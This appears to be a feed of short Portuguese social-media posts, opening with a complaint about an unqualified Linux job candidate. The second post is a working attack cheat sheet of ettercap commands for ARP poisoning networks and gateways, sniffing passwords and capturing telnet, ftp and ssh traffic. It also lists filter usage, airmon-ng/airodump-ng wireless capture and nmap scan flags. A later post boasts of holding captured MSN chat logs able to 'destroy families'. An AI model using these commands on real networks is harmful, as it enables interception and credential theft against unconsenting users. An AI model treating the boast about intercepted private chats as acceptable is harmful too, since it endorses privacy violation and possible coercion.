entrevistei um cara hoje para programação Java, no CV dele tinha "SysAdmin Linux" também. Pedi pra ele citar uma maneira comos os processos Linux se comunicavam entre sí. "Linux é bem seguro e deixa os processos isolados", essa foi a resposta dele, dai perguntei sobre outro assunto Kernel Space e User Space, disse que nunca tinha ouvido falar. Ai complica né, SysAdminLinux. Enfim a experiência do caboclo é subir um Linux EC2 na Aws seguindo tutorial no youtube, conclui isso depois que ele disse que bloqueva as portar pela interface Web de gerenciamento do VPS da Amazon. Espero que esse cara cai em sí uma hora ou outra.
Verifica apenas o fluxo da pacotes da maquina * ettercap -Tp Não realiza a varredura ARP, mas imprime o usuário de a senha e outras informações presentes nos pacotes * ettercap -Tzq Realiza o ataque ARP poisoning em todas as maquinas da rede * ettercap -T -M arp // // Realiza o ARP poisoning no gateway e nas maquinas entre 1 e 10, a op��o remote habilita o "sniff" do trafego que passa pelo gateway * ettercap -T -M arp:remote /146.134.30.254/ /146.134.30.1-10/ Obtem os pacotes dos protocolos telnet, ftp e ssh de toda a rede * ettercap -Tzq //21,22,23 Filtros #compilar filtro etterfilter ig.filter -o ig.ef #executar filtro ettercap -T -q -F ig.ef -M ARP // // ettercap -T -q -F ig.ef -M ARP /192.168.22.47/ // #wireless hacks airmon-ng start wlan0 #captura clientes perto de vc. airodump-ng wlan0 #nmap nmap -O ip nmap -sS nmap -Sv nmap -sNV netcat traceroute tcpdump hping3
tenho alguns logs de chats capturados do MSN que destruiriam familias facilmente.
the plan has been executed #blog #filho image
nunca foi GREAT, mas já foi menos pior do que tá. image